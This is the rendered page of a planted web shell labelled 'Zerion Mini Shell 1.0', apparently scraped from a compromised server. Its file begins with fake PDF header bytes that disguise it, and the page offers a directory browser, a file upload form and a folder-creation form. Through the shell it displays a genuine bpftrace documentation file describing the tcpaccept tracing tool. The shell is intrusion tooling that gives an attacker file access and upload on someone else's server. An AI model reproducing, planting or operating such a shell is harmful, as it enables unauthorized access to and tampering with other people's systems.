%PDF-
%PDF-
<form action="#" method="post"><input type="hidden" name="logout" value="1"> <input type="submit" value="logout"></form><!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="" rel="stylesheet" type="text/css">
<title>Mini Shell</title>
<style>
body{
font-family: "Racing Sans One", cursive;
background-color: #e6e6e6;
text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
background-color: #636263;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: silver;
}
#content .first:hover{
background-color: silver;
text-shadow:0px 0px 1px #757575;
}
table{
border: 1px #000000 dotted;
}
H1{
font-family: "Rye", cursive;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #fff;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</HEAD>
<BODY>
<H1><center><img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>
 Mini Shell <img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"/>
 </center></H1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Direktori : <a href="?path=/">/</a><a href="?path=//usr">usr</a>/<a href="?path=//usr/share">share</a>/<a href="?path=//usr/share/doc">doc</a>/<a href="?path=//usr/share/doc/bpftrace">bpftrace</a>/<a href="?path=//usr/share/doc/bpftrace/examples">examples</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="upload" />
</form>
</td></tr>
<tr><td><form enctype="multipart/form-data" method="POST">
Create Path : <input type="text" name="path_create" />
<input type="submit" value="create" />
</form></td></td><tr><td>Current File : //usr/share/doc/bpftrace/examples/tcpaccept_example.txt</tr></td></table><br /><pre>Demonstrations of tcpaccept, the Linux bpftrace/eBPF version.


This tool traces the kernel function accepting TCP socket connections (eg, a
passive connection via accept(); not connect()). Some example output (IP
addresses changed to protect the innocent):

# ./tcpaccept.bt
Tracing tcp accepts. Hit Ctrl-C to end.
TIME     PID     COMM           RADDR          RPORT LADDR          LPORT BL
00:34:19 3949061 nginx          10.228.22.228  44226 10.229.20.169  8088  0/128
00:34:19 3951399 ruby           127.0.0.1      52422 127.0.0.1      8000  0/128
00:34:19 3949062 nginx          10.228.23.128  35408 10.229.20.169  8080  0/128


This output shows three connections, an IPv4 connections to PID 3951399, a &quot;ruby&quot;
process listening on port 8000, and one connection to a &quot;nginx&quot; process
listening on port 8080. The remote address and port are also printed, and the accept queue
current size as well as maximum size are shown.

The overhead of this tool should be negligible, since it is only tracing the
kernel function performing accept. It is not tracing every packet and then
filtering.

This tool only traces successful TCP accept()s. Connection attempts to closed
ports will not be shown (those can be traced via other functions).

There is another version of this tool in bcc: https://github.com/iovisor/bcc

USAGE message:

# ./tcpaccept.bt
</pre><center><br />Zerion Mini Shell <font color="green">1.0</font></center>
</BODY>
</HTML>